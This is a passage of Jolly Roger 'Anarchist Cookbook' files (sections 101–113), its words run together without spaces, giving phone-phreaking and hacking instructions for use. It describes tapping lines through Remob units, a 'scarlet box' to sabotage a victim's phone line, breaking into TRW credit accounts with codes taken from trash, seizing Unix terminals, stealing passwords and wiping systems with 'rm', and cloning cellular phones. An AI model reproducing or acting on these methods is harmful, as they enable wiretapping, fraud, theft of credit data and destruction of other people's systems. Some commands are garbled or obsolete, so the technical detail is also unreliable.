computerstousewouldbeanAtariST.Itisoneoftheeasiercomputerstouse becausetheredboxtonescanbeproducedinbasicwithonlyabout5statements. 101.RemObSbyTheJollyRoger SomeofyoumayhaveheardofdevicescalledRemobswhichstandsforRemote ObservationSystem.TheseDevicesallowsupposedlyauthorizedtelephone employeestodialintothemfromanywhere,andthenusinganordinarytouchtone fone,tapintoacustomer'slineinaspecialreceiveonlymode.[Themouthpiece circuitisdeactivated,allowingtotallysilentobservationfromanyfoneinthe world(Wiretappingwithoutacourtorderisagainstthelaw)] HowRemobsWork DialthenumberofaRemobunit.Bellisrumoredtoputtheminthe555 informationexchanges,oronspecialaccesstrunks[Unreachableexceptviablue box].Atonewillthenbeheardforapproximately2secondsandthensilence. Youmustkeyin(InDTMF)a2to5digitaccesscodewhileholdingeachdigit downatleast1second.Ifthecodeisnotenteredwithin5or6seconds,the Remobwillreleaseandmustbedialedagain.Ifthecodeissupposedlyanother tonewillbeheard.Asevendigitsubscriberfonenumbercanthenbeentered [TheRemobcanonlyhandlecertain'exchanges'whichareprewired,sousually onemachinecannotmonitoranentireNPA].TheRemobwillthenconnecttothe subscribersline.Thelistenerwillhearthelowlevelidletoneaslongasthe monitoredpartyisonhook.Asthemonitoredpartydials[rotaryorDTMF],the listenerwouldhear[AndRecord]thenumberbeingdialed.ThentheENTIRE conversation,datalink,whateveristakingplace,allwithoutdetection.There isnocurrentboxwhichcandetectRemobobservation,sinceitisbeingdone withthetelephoneequipmentthatmakestheconnection.Whenthelisteneris finishedmonitoringofthatparticularcustomer,hekeysthelastdigitofthe accesscodetodisconnectshimfromthemonitoredlineandreturntothetoneso thathecankeyinanother7digitfonenumber.Whenthelisteneristotally finishedwiththeRemob,hekeysasingle'disconnectdigit'whichdisconnects himfromtheRemobsothatthedevicecanresetandbereadyforanothercaller. HistoryofRemobs BellhaskepttheexistenceofRemobsverylowkey.Onlyin1974,Bell acknowledgedthatRemobsexisted.Thedevicewasfirstmadepublicduring hearingson"TelephoneMonitoringPracticesbyFederalAgencies"beforea subcommitteeongovernmentoperations.HouseofRepresentatives,NinetyThird Congress,June1974.IthassincebeenstatedbyBellthattheRemobdevicesare usedexclusivelyformonitoringBellemployeessuchasoperators,information operators,etc.,tokeeptabsontheirperformance.[Suuureee,werestupid] PossibleUsesforRemobs ThepossibleusesofRemobsarealmostasendlessastheusesofself createdfoneline.Imaginetheabilitytomonitorbanklinesetc,justoffthe topofmyheadIcanthinkoftheseapplications: DataMonitoringof: TRW NationalCreditBureau. AT&TCosmos. BankInstitutions. CompuServeandotherNetworks. VoiceMonitoringof: BankInstitutions. MailOrderbusinesses. BellTelephonethemselves. Anyplacehandlingsensitiveorimportantinformation. Anyonethatyoumaynotlike.

WithjustoneRemob,someonecouldgethundredsofcreditcards,findout whowasonvacation,getCompuServepasswordsbythedozens,disconnectpeoples fones,docreditchecks,findoutaboutanythingthattheymaywanttofindout about.I'msureyoubrilliantcanseethevalueofatelephonehobbyistanda telecommunicationsenthusiastgettinghishandsonafewchoiceRemobs. Caution IfanyreadershoulddiscoveraRemobduringhis(orher)scanningexcursions, pleasekeepinmindtheverystrictfederallawsregardingwiretappingand unauthorizeduseofprivateBellproperty. 102.ScarletBoxPlansbyTheJollyRoger ThepurposeofaScarletboxistocreateaverybadconnection,itcanbeused tocrashaBBSorjustmakelifemiserableforthoseyouseektoavenge. Materials: 2alligatorclips 3inchwire,oraresister(plainwirewillcreategreatestamountof static)(Resisterwilldecreasetheamountofstaticinproportiontothe resisteryouareusing) 1. Findthephoneboxatyourvictimshouse,andpopthecoveroff. 2. Findthetwoprongsthatthephonelineyouwishtoboxareconnectedto. 3. Hookyouralligatorclipstoyour(wire/resister). 4. Findthelowermiddleprongandtakeoffallwiresconnectedtoit,I thinkthisdisablesthegroundandcallwaitingandshitlikethat. 5. Nowtakeoneofthealligatorclipsandattachittotheuppermostprong, andtaketheotherandattachittothelowermiddleprong. 6. Nowputthecoverbackontheboxandtakeoff!! **########** **######** ########/ ######/ ########/ / / / / / / / **/ ** ** ** ** ** (**)=prongs ** (/)=(wire/resister) (##)=somephonebullshit 103.SilverBoxPlansbyTheJollyRoger Introduction: FirstabitofPhoneTrivia.Astandardtelephonekeypadhas12buttons.These buttons,whenpushed,produceacombinationoftwotones.Thesetonesrepresent

therowandcolumnofthebuttonyouarepushing. 111 234 037 967 697(1)(2)(3) 770(4)(5)(6) 851(7)(8)(9) 941(*)(0)(#) So(1)producesatoneof697+1209,(2)producesatoneof697+1336,etc. Function: WhattheSilverBoxdoesisjustcreatesanothercolumnofbuttons,withthenew toneof1633.ThesebuttonsarecalledA,B,C,andD. Usefulness: Anyonewhoknowsanythingaboutphreakingshouldknowthatintheolddaysof phreaking,phreaksusedhardwaretohavefuninsteadofotherpeople'sSprint andMCIcodes.Themostfamous(anduseful)wasthegoodol'BlueBox.However, MaBelldecidedtofightbackandnowmostphonesystemshaveprotections againsttoneemittingboxes.Thismakesboxingjustaboutfutileinmostareas oftheUnitedStates(i.e.thoseareaswithCrossbarorStepByStep).Ifyou liveinornearagoodsizedcity,thenyourphonesystemisprobablyuptodate (ESS)andthisbox(andmostothers)willbeuseless.However,ifyoulivein themiddleofnowhere(nooffenseintended),youmayfindauseforthisand otherboxes. Materials: 1FootofBlueWire 1FootofGrayWire 1FootofBrownWire 1SmallSPDTSwitch(*) 1StandardMaBellPhone (*)SPDT=SinglePole/DoubleThrow Tools: 1SolderingIron 1FlatTipScrewdriver Procedure: 1. Loosenthetwoscrewsonthebottomofthephoneandtakethecasingoff. 2. Loosenthescrewsonthesideofthekeypadandremovethekeypadfromthe mountingbracket. 3. Removetheplasticcoverfromthekeypad. 4. Turnthekeypadsothat*0#isfacingyou.Turnthekeypadover.You'll seeabunchofwires,contacts,twoBlackCoils,etc. 5. LookattheCoilontheleft.Itwillhavefive(5)SolderContactsfacing you.SoldertheGrayWiretothefourthContactPolefromtheleft. 6. SoldertheotherendoftheGrayWiretotheLeftPoleoftheSPDTSwitch. 7. FindtheThree(3)GoldPlatedContactsonthebottomedgeofthekeypad. OntheLeftContact,gentlyseparatethetwotouchingConnectors(they're solderedtogether)andspreadthemapart. 8. SoldertheBrownWiretotheContactfarthestfromyou,andsolderthe otherendtotheRightPoleoftheSPDTSwitch. 9. SoldertheBlueWiretotheClosestContact,andtheotherendtothe CenterPoleoftheSPDTSwitch. 10. Putthephonebacktogether. UsingTheSilverBox: Whatyouhavejustdonewasinstalledaswitchthatwillchangethe369#column

intoanABCDcolumn.Forexample,todiala'B',switchtoSilverBoxTonesand hit'6'. NooneissureoftheA,B,andCuses.However,inanareawithanold phonesystem,the'D'buttonhasaninterestingeffect.DialDirectory Assistanceandholddown'D'.Thephonewillring,andyoushouldgetapulsing tone.Ifyougetapissedoffoperator,youhaveanewerphonesystemwith defensesagainstSilverBoxes.Atthepulsingtone,diala6or7.Theseare loopends. 104.BellTrashingbyTheJollyRoger ThePhoneCo.willgotoextremesonoccasions.Infact,unlessyoureallyknow whattoexpectfromthem,theywillsurprisetheheckoutofyouwiththeir "unpublishedtariffs".Recently,asituationwasbroughttomyattentionthatup tillthenIhadbeentotallyunawareof,leasttomention,hadanyconcern about.Itinvolvedgarbage!Thephoneco.willgoasfarastoprosecuteanyone whorummagesthroughtheirgarbageandhelpshimselftosome Ofcourse,theyhavetheirreasonsforthis,andnodoubtbenefitfromsuch action.But,whyshouldtheybesopickyaboutgarbage?Theanswersoonbecame cleartome:thosehugemetalbinsarefilledupwithmorethanwasteoldfood andrefuse...AlthoughitisPacificTele.policytorecyclepaperwaste products,sometimesemployeesdooverlookthissacredoperationwhensortingthe garbage.ThustopsecretconfidentialPhoneCo.recordsgotothegarbagebins insteadofthepapershredders.Sinceitisconstantlybeingupdatedwith "companymemorandums,andsuppliedwithextensivereferencematerial,thePhone co.mustcontinuallydisposeoftheoutdatedmaterials.Somephonecompaniesare suppliedeachyearwiththecomplete"SystemPractices"guide.Thispublication isanover40footlonglibraryofreferencematerialabouteverythingtodo withtelephones.Astheneweditionarriveseachyear,theoldversionof "SystemPractices"mustalsobethrownout. Iveryquicklyfiguredoutwheresomelocalphonephreaksweregettingtheir material.Theycrawlintothegarbagebinsandremoveselecteditemsthatareof particularinteresttothemandtheirfellowphreaks.Onephonephreakinthe LosAngelesareahassalvagedthecomplete1972editionof"BellSystem Practices".Itissolargeandwasoutoforder(thebindershadbeenremoved) thatittookhimoverayeartosortitoutandcreateenoughshelvingforitin hisgarage. Muchofthis"TopSecret"informationissosecretthatmostphonecompanies havenoideawhatisintheirfiles.Theyhavetheirhandsfullsimplyreplacing everythingeachtimeachangeinwordingrequiresanewrevision.Itseemsthey wastemorepaperthantheycanread! IttookquiteawhileforHollywoodCaltrafficmanagertofigureouthowallof thelocalphonephreaksconstantlydiscoveredtheswitchroomtestnumbers. Wheneversomeonewantedtousethetestboard,theyfoundthelocalphonephreaks onthelinestalkingtoallpointsallovertheworld.Itgottothepointwhere thelocalgarbagebuffsknewmoreabouttheofficeoperationsthantheemployees themselves.Onephreakwentsofarastocallinandtellaswitchmanwhathis nextdailyassignmentwouldbe.This,however,provedtobetoomuch.The switchmantracedthecallandonephonephreakwasdeniedthetoolofhistrade. Inanotherratherhumorousincident,afellowphreakwasrummagingthroughthe trashbinwhenheheardsomeoneapproaching.Hepressedupagainstthesideof thebinandsilentlywaitedforthegoodiestocome.Youcanimaginehis surprisewhenthegarbagefromthelunchroomlandedonhishead.Mostpeople findeveningsbestforcheckingouttheirlocalTelcotrashpiles.Theonly thingnecessaryisaflashlightand,inthecasementionedabove,possiblya

raincoat.Awordofwarningthough,beforeyourushoutanddiveintothetrash heap.Itisprobablyillegal,butnomatterwhereyoulive,youcertainlywon't getthelocalpolicemantoholdyourflashlightforyou. 105.CanadianWATSPhonebookbyTheJollyRoger 8002274004ROLMCollagenCorp. 8002278933ROLMCollagenCorp. 8002684500VoiceMail 8002684501ROLMTexaco 8002684505VoiceMail 8002686364NationalDataCredit 8002687800VoiceMail 8002687808VoiceMail 8003289632VoiceMail 8003872097VoiceMail 8003872098VoiceMail 8003878803ROLMCanadianTire 8003878861ROLMCanadianTire 8003878862ROLMCanadianTire 8003878863ROLMCanadianTire 8003878864ROLMCanadianTire 8003878870ROLMHalifaxLife 8003878871ROLMHalifaxLife 8003879115ASPENSunsweep 8003879116ASPENSunsweep 8003879175PBX[HoldMusic=CHUMFM] 8003879218VoiceMessenger 8003879644Carrier 8004262638Carrier 8005242133Aspen 8006635000PBX/VoiceMail[HoldMusic=CFMIFM] 8006635996VoiceMail(5rings) 8008476181VoiceMail NOTES:Eachandeveryoneofthesenumbersisavailabletothe604(British Columbia)AreaCode.MostareavailableCanadaWideandsomearelocatedinthe UnitedStates.NumbersdesignatedROLMhavebeenidentifiedasbeingconnected toaROLMPhonemailsystem.NumbersdesignatedASPENareconnectedtoanASPEN voicemessagesystem.NumbersdesignatedVOICEMAILhavenotbeenidentifiedas toequipmentinuseonthatline.Numbersdesignatedcarrierareansweredbya modemordataset.MostVoiceMessagesystems,andALLRolms,soundlikean answeringmachine.Press0duringtherecordingwheninarolm,*or#orother DTMFinothersystems,andbepropelledintoanotherworld... 106.HackingTRWbyTheJollyRoger WhenyoucallTRW,thedialupwillidentifyitselfwiththemessage "TRW".Itwillthenwaitforyoutotypetheappropriateanswerback(suchas CTRLG)OnceThishasbeendone,thesystemwillsay"CIRCUITBUILDINGIN PROGRESS"Alongwithafewnumbers.Afterthis,itclearsthescreen(CTRLL) followedbyaCTRLQ.AfterthesystemsendstheCTRLQ,Itisreadyforthe request.Youfirsttypethe4characteridentifierforthegeographicalareaof theaccount.. (ForExample)TCA1forcertainCalif.&Vicinitysubscribers. TCA2AsecondCALF.TRWSystem. TNJ1TheirNJDatabase. TGA1TheirGeorgiaDatabase.

TheuserthentypesAandthenonthenextline,hemusttypehis3char. Option.MostRequestsusetheRTSoption.OPX,RTX,andafewothersexist. (NOTE)TRWwillacceptanA,C,orSasthe'X'intheoptionsabove.)Then finally,theusertypeshis7digitsubscribercode.Heappendshis34 characterpasswordafterit.ItseemsthatifyoumanagetogetholdofaTRW Printout(TrashingatSears,Saks,ETC.orfromgettingyourcreditprintout fromthem)Theirsubscribercodewillbeonitleavingonlya34characterp/w uptoyou. ForExample, (CalltheDialUp) TRWSystemTypes,(ST)CTRLG (Youtype,YT)Circuitbuildinginprogress1234 (ST)CTRLLCRTLQ(TCA1CYT)BTS3000000AAA (YT] Note:ThissystemisinHalfDuplex,EvenParity,7Bitsperwordand2Stop Bits. CAUTION:ItisaverystressedrumorthataftertypingintheTRWpasswordThree (3)times..ItsetsanAutomaticNumberIdentificationonyourass,sobe careful.Andforgetwhotoldyouhowtodothis.. 107.HackingVax's&UnixbyTheJollyRoger UnixisatrademarkofAT&T(andyouknowwhatthatmeans) Inthisarticle,wediscusstheunixsystemthatrunsonthevariousvax systems.Ifyouareonanotherunixtypesystem,somecommandsmaydiffer,but sinceitislicensedtobell,theycan'tmakemanychanges. Hackingontoaunixsystemisverydifficult,andinthiscase,weadvisehaving aninsidesource,ifpossible.Thereasonitisdifficulttohackavaxisthis: Manyvax,afteryougetacarrierfromthem,respond=> Login: Theygiveyounochancetoseewhattheloginnameformatis.Mostcommonlyused aresinglewords,under8digits,usuallytheperson'sname.Thereisaway aroundthis:Mostvaxhaveanacct.called'suggest'forpeopletousetomakea suggestiontothesystemrootterminal.Thisisusuallywatchedbythesystem operator,butatlateheisprobablyathomesleepingorscrewingsomeone's brainsout.Sowecanwriteaprogramtosendatthevaxthistypeofamessage: Ascreenfreeze(CntlS),screenclear(systemdependant),about255garbage characters,andthenacommandtocreatealoginacct.,afterwhichyouclear thescreenagain,thenunfreezetheterminal.Whatthisdoes:Whentheterminal isfrozen,itkeepsabufferofwhatissent.Well,thebufferisabout127 characterslong.soyouoverflowitwithtrash,andthenyousendacommandline tocreateanacct.(Systemdependant).Afterthisyouclearthebufferand screenagain,thenunfreezetheterminal.Thisisabadwaytodoit,anditis muchnicerifyoujustsendacommandtotheterminaltoshutthesystemdown, orwhateveryouareafter...Thereisalways,*Always*anacct.calledroot,the mostpowerfulacct.tobeon,sinceithasallofthesystemfilesonit.If youhackyourwayontothisone,theneverythingiseasyfromhereon...Onthe unixsystem,theabortkeyistheCntlDkey.Watchhowmanytimesyouhitthis, sinceitisalsoawaytologoffthesystem!Alittleaboutunixarchitecture: Therootdirectory,calledroot,iswherethesystemresides.Afterthiscomea few'sub'rootdirectories,usuallytogroupthings(statshere,privstuff here,theuserloghere...).Underthiscomesthesuperuser(theoperatorofthe system),andthenfinallythenormalusers.Intheunix'Shell'everythingis treatedthesame. Bythiswemean:Youcanaccessaprogramthesamewayyouaccessauser

directory,andsoon.Thewaytheunixsystemwaswritten,everything,users included,arejustprogramsbelongingtotherootdirectory.Thoseofyouwho hackedontotheroot,smile,sinceyoucanscreweverything...themainlevel (execlevel)promptontheunixsystemisthe$,andifyouareontheroot,you havea#(superuserprompt).Ok,afewbasicsforthesystem...Toseewhereyou are,andwhatpathsareactiveinregardstoyouruseraccount,thentype =>pwd Thisshowsyouracct.separatedbyaslashwithanotherpathname(acct.), possiblymanytimes.Toconnectthroughtoanotherpath,ormanypaths,you wouldtype: You=>path1/path2/path3 Andthenyouareconnectedallthewayfrompath1topath3.Youcan runtheprogramsonallthepathsyouareconnectedto.Ifitdoes notallowyoutoconnecttoapath,thenyouhaveinsufficientprivs,or thepathisclosedandarchivedontotape.Youcanrunprogramsthisway also: you=>path1/path2/path3/programname Unixtreatseverythingasaprogram,andthusthereafewcommandstolearn... Toseewhatyouhaveaccesstointheendpath,type: ls forlist.Thisshowtheprogramsyoucanrun.Youcanconnecttotheroot directoryandrunit'sprogramswith=> /root Bytheway,mostunixsystemshavetheirlogfileontheroot,soyoucansetup awatchonthefile,waitingforpeopletologinandsnatchtheirpasswordas itpassesthruthefile.Toconnecttoadirectory,usethecommand: =>cdpathname Thisallowsyoutodowhatyouwantwiththatdirectory.Youmaybeaskedfora password,butthisisagoodwayoffindingotherusernamestohackonto.The wildcardcharacterinunix,ifyouwanttosearchdownapathforagameor such,isthe*. =>ls/* Shouldshowyouwhatyoucanaccess.Thefiletypesarethesameastheyareon adec,sorefertothatsectionwhenexaminingfile.Toseewhatisinafile, usethe =>pr filenamecommand,forprintfile.Weadviseplayingwithpathnamestogetthe hangoftheconcept.Thereisonlinehelpavailableonmostsystemswitha 'help'ora'?'.Weadviseyoulookthruthehelpfilesandpayattentionto anythingtheygiveyouonpathnames,orthecommandsforthesystem.Youcan,as auser,createordestroydirectoriesonthetreebeneathyou.Thismeansthat rootcankilleverythingbutroot,andyoucankillanythatarebelowyou. Thesearethe =>mkdirpathname =>rmdirpathname

commands.Onceagain,youarenotaloneonthesystem...type=> who toseewhatotherusersareloggedintothesystematthetime.Ifyou wanttotalktothem=> writeusername Willallowyoutochatatthesametime,withouthavingtoworryaboutthe parser.Tosendmailtoauser,say =>mail Andenterthemailsubsystem.Tosendamessagetoalltheusersonthesystem, say =>wall Whichstandsfor'writeall'.Bytheway,onafewsystems,allyouhavetodo ishitthekeytoendthemessage,butonothersyoumusthitthecntlDkey. Tosendasinglemessagetoauser,say =>writeusername thisisveryhandyagain!Ifyousendthesequenceofcharactersdiscussedat theverybeginningofthisarticle,youcanhavethesuperuserterminaldo tricksforyouagain. Privs: Ifyouwantsuperuserprivs,youcaneitherloginasroot,oredityouracct. soitcansay =>su thisnowgivesyouthe#prompt,andallowsyoutocompletelybypassthe protection.Thewonderfulsecurityconsciousdevelopersatbellmadeitvery difficulttodomuchwithoutprivs,butonceyouhavethem,thereisabsolutely nothingstoppingyoufromdoinganythingyouwantto.Tobringdownaunix system: =>chdir/bin =>rm* thiswipesoutthepathnamebin,whereallthesystemmaintenancefilesare.Or try: =>rr Thisrecursivelyremoveseverythingfromthesystemexcepttheremovecommand itself.Ortry: =>kill1,1 =>sync Thiswipesoutthesystemdevicesfromoperation.Whenyouarefinallysickand tiredfromhackingonthevaxsystems,justhityourcntldandrepeatkey,and youwilleventuallybeloggedout. Thereasonthisfileseemstobeverysketchyisthefactthatbellhas7 licensedversionsofunixoutinthepublicdomain,andthesecommandsarethose

commontoallofthem.Irecommendyouhackontotherootorbindirectory, sincetheyhavethehighestlevelsofprivs,andthereisreallynotmuchyou cando(exceptdevelopsoftware)withoutthem. 108.VerificationCircuitsbyTheJollyRoger 1. Onebusyverificationconferencecircuitisalwaysprovided.Thecircuit isathreewayconferencebridgethatenablesanoperatortoverifythe busy/idleconditionofasubscriberline.Uponrequestofapartyattemptingto reachaspecifieddirectorynumber,theoperatordialsthecalledlinenumberto determineifthelineisinuse,ifthereceiverisoffthehook,oriftheline isinlockoutduetoafaultcondition.Theoperatorthenreturnstotheparty tryingtoreachthedirectorynumberandstatestheconditionoftheline.Lines withdatasecuritycannotbeaccessedforbusyverificationwhenthelineisin use.(Referalsotodatasecurity.) 2. Threeportsareassignedtoeachbusyverificationconferencecircuit.One portisforoperatoraccessandtwoportsareusedtosplitanexisting connection.Toverifythebusy/idleconditionofaline,theoperator establishedaconnectiontotheoperatoraccessportanddialsthedirectory numberofthelinetobeverified.Ifthelineisinuse,theexisting connectionisbrokenandimmediatelyreestablishedthroughtheothertwoports ofthebusyverificationcircuitwithoutinterruption.Busyverificationcircuit iscontrolledbyaccesscode.Adedicatedtrunkcanbeusedbutisnot necessary. 3. Thebusyverificationcircuitalsocanbeusedfortestverifyfromthe wirechiefstestpanelB.Additionalbusyverificationconferencecircuits (002749)thereitisrightoutofanESSmanualwordforword!AndI'mgetting 25linearfeetofESSmanuals!!!Notcountingthestackreceivedsofar! 109.WhiteBoxPlansbyTheJollyRoger Introduction: TheWhiteBoxissimplyaportabletouchtonekeypad.Formoreinformationon touchtone,seemySilverBoxPlans. Materials: 1TouchToneKeypad 1Miniature1000to8OhmTransformer(RadioShack#2731380) 1Standard8OhmSpeaker 29VBatteries 29VBatteryClips Procedure: 1. ConnecttheRedWirefromtheTransformertoeitherterminalonthe speaker. 2. ConnecttheWhiteWirefromthetransformertotheotherterminalonthe speaker. 3. ConnecttheRedWirefromoneBatteryCliptotheBlackWirefromthe otherBatteryClip. 4. ConnecttheRedWirefromthesecondBatteryCliptotheGreenWirefrom theKeypad. 5. ConnecttheBlueWirefromtheKeypadtotheOrange/BlackWirefromthe Keypad. 6. ConnecttheBlackWirefromthefirstBatteryCliptothetwoabovewires (BlueandBlack/Orange). 7. ConnecttheBlackWirefromtheKeypadtotheBlueWirefromthe Transformer. 8. ConnecttheRed/GreenWirefromtheKeypadtotheGreenWirefromthe

Transformer. 9. MakesuretheBlackWirefromtheTransformerandtheremainingwiresfrom theKeypadarefree. 10. HookuptheBatteries. Optional: 1. Putitallinacase. 2. AddaSilverBoxtoit. Use: Justuseitlikeanormalkeypad,exceptputthespeakernexttothereceiverof thephoneyou'reusing. 110.TheBLASTBoxbyTheJollyRoger Everwanttoreallymakeyourselfbeheard?Evertalktosomeoneonthephone whojustdoesn'tshutup?Orjustcalltheoperatorandpophereardrum?Well, upuntilrecentlyithasbeenimpossibleforyoutodothesethings.Thatis, unlessofcourseyou'vegotablastbox.Allablastboxis,isareallycheap amplifier,(around5wattsorso)connectedinplaceofthemicrophoneonyour telephone.Itworksbestonmodel500AT&TPhones,andifconstructedsmall enough,canbeplacedinsidethephone. Construction: Constructionisnotreallyimportant.Wellitis,butsinceI'mlettingyoumake yourownamp,Ireallydon'thavetoincludethis. Usage: Onceyou'vebuiltyourblastbox,simplyconnectamicrophone(orusethe microphonefromthephone)totheinputoftheamplifier,andpresto.Thereit is.Now,believeitornot,thisdeviceactuallyworks.(Atleastoncrossbar.) ItseemsthatIllinoisbellswitchingsystemsallowquitealotofcurrentto passrightthroughtheswitchingoffice,andouttowhoeveryou'recalling.When youtalkinthephone,itcomesoutoftheotherphone(againitworksbestif thephonethatyou'recallinghasthestandardwesternelectricearpiece) incrediblyloud.ThisdeviceisespeciallygoodforPBSSubscriptiondrives. Have"Phun",anddon'tgetcaught! 111.DealingwiththeRate&RouteOperatorbyTheJollyRoger Itseemsthatfewerandfewerpeoplehaveblueboxesthesedays,andthatis reallytoobad.Blueboxes,whilenotallthatgreatformakingfreecalls (sincetheTPCcantellwhenthecallwasmade,aswellaswhereitwastooand from),arereallyalotoffuntoplaywith.ShortofbecomingarealliveTSPS operator,theyareabouttheonlywayyoucanreallyplaywiththenetwork. Forthefewofyouwithblueboxes,herearesomephraseswhichmaymakelife easierwhendealingwiththerate&route(R&R)operators.TogettheR&Rop, yousendaKP+141+ST.InsomeareasyoumayneedtoputanotherNPAbefore the141(i.e.,KP+213+141+ST),ifyouhavenolocalR&Rops. TheR&Roperatorhasamyriadofinformation,andallittakestogetthisdata ismumblingcrypticphrases.Therearebasicallyfourspecialphrasestogive theR&Rops.TheyareNUMBERSroute,DIRECTORYroute,OPERATORroute,andPLACE NAME. TogetanR&Ranareacodeforacity,onecancalltheR&Roperatorandaskfor thenumbersroute.Forexample,tofindtheareacodeforCarsonCity,Nevada, we'dasktheR&Ropfor"CarsonCity,Nevada,numbersroute,please."andget theanswer,"Right...702plus."meaningthat702plus7digitsgetsusthere.

Sometimesdirectoryassistanceisn'tjustNPA+131.Thewaytogettheseroutings istocallR&Randaskfor"Anaheim,California,directoryroute,please."Of course,she'dtellusitwas714plus,whichmeans714+131getsustheD.A.op there.Thisissortofpointlessexample,butIcouldn'tcomeupwithabetter oneonshortnotice. Let'ssayyouwantedtofindouthowtogettotheinwardoperatorfor Sacremento,California.Thefirstsixdigitsofanumberinthatcitywillbe required(theNPAandanNXX).Forexample,letususe916756.Wewouldcall R&R,andwhentheoperatoranswered,say,"916756,operatorroute,please."The operatorwouldsay,"916plus001plus."Thismeansthat916+001+121will getyoutheinwardoperatorforSacramento.Doyouknowthecitywhich correspondsto503640?TheR&Roperatordoes,andwilltellyouthatitis Hillsboro,Oregon,ifyousweetlyaskfor"Placename,503640,please." Forexample,let'ssayyouneedthedirectoryrouteforSveg,Sweden.Simply callR&R,andaskfor,"International,Baden,Switzerland.TSPSdirectoryroute, please."Inresponsetothis,you'dget,"Right...DirectorytoSveg,Sweden. Countrycode46plus1170."Soyou'drouteyourselftoaninternationalsender, andsend46+1170togettheD.A.operatorinSweden. Inwardoperatorroutingstovariouscountriesareobtainedthesameway "International,London,England,TSPSinwardroute,please."andget"Country code44plus121."Therefore,44plus121getsyouinwardforLondon. Inwardscangetyoulanguageassistanceifyoudon'tspeakthelanguage.Tell theforeigninward,"UnitedStatescalling.Languageassistanceincompletinga callto(calledparty)at(callednumber)." R&Roperatorsarepeoplearepeopletoo,y'know.Soalwaysbepolite,makesure useof'em,anddialwithcare. 112.CellularPhreakingbyTheJollyRoger Thecellular/mobilephonesystemisonethatisperfectlysetuptobeexploited byphreakswiththeproperknowledgeandequipment.Thankstoderegulation,the regionalBOC's(BellOperatingCompanies)arescatteredanddonotcommunicate muchwitheachother.Phreakscantakeadvantageofthisbypretendingtobe mobilephonecustomerswhose"homebase"isacityservedbyadifferentBOC, knownasa"roamer".SinceitisimpracticalforeachBOCtokeeptrackofthe customersofalltheotherBOC's,theywillusuallyallowthecustomertomake thecallshewishes,oftenwithasurchargeofsomesort. Thebillisthenforwardedtotheroamer'shomeBOCforcollection.However,it isfairlysimple(withthecorrecttools)tocreateabogusIDnumberforyour mobilephone,andpretendtobearoamerfromsomeothercityandstate,that's "justvisiting".WhenyourBOCtriestocollectforthecallsfromyouralleged "homeBOC",theywilldiscoveryouarenotarealcustomer;butbythen,youcan createanentirelynewelectronicidentity,andusethatinstead. Howdoesthecellularsystemknowwhoiscalling,andwheretheyare?Whena mobilephoneentersacell'sareaoftransmission,ittransmitsitsphonenumber andits8digitIDnumbertothatcell,whowillkeeptrackofituntilitgets farenoughawaythatthesoundqualityissufficientlydiminished,andthenthe phoneis"handedoff"tothecellthatthecustomerhaswalkedordriveninto. Thisprocesscontinuesaslongasthephonehaspowerandisturnedon.Ifthe phoneisturnedoff(orthecaris),someoneattemptingtocallthemobilephone willreceivearecordingalongthelinesof"Themobilephonecustomeryouhave dialedhasleftthevehicleordrivenoutoftheservicearea."Whenacallis madetoamobilephone,theswitchingequipmentwillchecktoseeifthemobile

phonebeingcalledis"loggedin",sotospeak,orpresentinoneofthecells. Ifitis,thecallwillthenact(tothespeakingparties)justlikeanormal callthecallermayhearabusytone,thephonemayjustring,orthecallmay beanswered. Howdoestheswitchingequipmentknowwhetherornotaparticularphoneis authorizedtousethenetwork?Manytimes,itdoesn't.Whenadealerinstallsa mobilephone,hegivesthephone'sIDnumber(an8digithexadecimalnumber)to thelocalBOC,aswellasthephonenumbertheBOCassignedtothecustomer. Thereafter,wheneveraphoneispresentinoneofthecells,thetwonumbersare checkedtheyshouldberegisteredtothesameperson.Iftheydon'tmatch, thetelcoknowsthatanattemptedfraudistakingplace(oratbest,some transmissionerror)andwillnotallowcallstobeplacedorreceivedatthat phone.However,itisimpractical(especiallygiventhepresentstateof deregulation)forthetelcotohaverecordsofeverycellularcustomerofevery BOC.Therefore,ifyou'regoingtocreateafakeID/phonenumbercombination,it willneedtobe"based"inanareathathasacellularsystem(obviously),hasa differentBOCthanyourlocalareadoes,andhassomesortofa"roamer" agreementwithyourlocalBOC. Howcanone"phreak"acellularphone?Therearethreegeneralareaswhen phreakingcellularphones;usingoneyoufoundinanunlockedcar(oran unattendedwalkaboutmodel),modifyingyourownchipsettolooklikea differentphone,orrecordingthephonenumber/IDnumbercombinationssentby otherlocalcellularphones,andusingthoseasyourown.Mostcellularphones includeacrude"password"systemtokeepunauthorizedusersfromusingthe phonehowever,dealersoftensetthepassword(usuallya3to5digitcode)to thelastfourdigitsofthecustomer'smobilephonenumber.Ifyoucanfindthat somewhereonthephone,you'reinluck.Ifnot,itshouldn'tbeTOOhardto hack,sincemostpeoplearen'tsmartenoughtousesomethingbesides"1111", "1234",orwhatever.Ifyouwanttomodifythechipsetinacellularphoneyou bought(orstole),therearetwochips(ofcourse,thisdependsonthemodeland manufacturer,yoursmaybedifferent)thatwillneedtobechangedone installedatthemanufacturer(oftenepoxiedin)withthephone'sIDnumber,and oneinstalledbythedealerwiththephonenumber,andpossiblethesecurity code.Todothis,you'llobviouslyneedanEPROMburneraswellasthesame sortofchipsusedinthephone(orafriendlyandunscrupulousdealer!).Asto recordingthenumbersofothermobilephonecustomersandusingthem;asfaras Iknow,thisisjusttheory...butitseemsquitepossible,ifyou'vegotthe equipmenttorecordanddecodeit.Thecellularsystemwouldprobablyfreakout iftwophones(withvalidID/phonenumbercombinations)werebothpresentinthe networkatonce,butitremainstobeseenwhatwillhappen. 113.CheeseboxPlansbyTheJollyRoger ACheesebox(namedforthetypeofboxthefirstonewasfoundin)isatypeof boxwhichwill,ineffect,makeyourtelephoneaPayPhone.....Thisisasimple, modernized,andeasywayofdoingit.... InsideInfo:Thesewerefirstusedbybookiesmanyyearsagoasawayofmaking callstopeoplewithoutbeingcalledbythecopsorhavingtheirnumberstraced and/ortapped...... HowToMakeAModernCheeseBox Ingredients: 1CallForwardingserviceontheline 1SetofRedBoxTones Thenumbertoyourprefix'sInterceptoperator(dosomescanningforthis one)

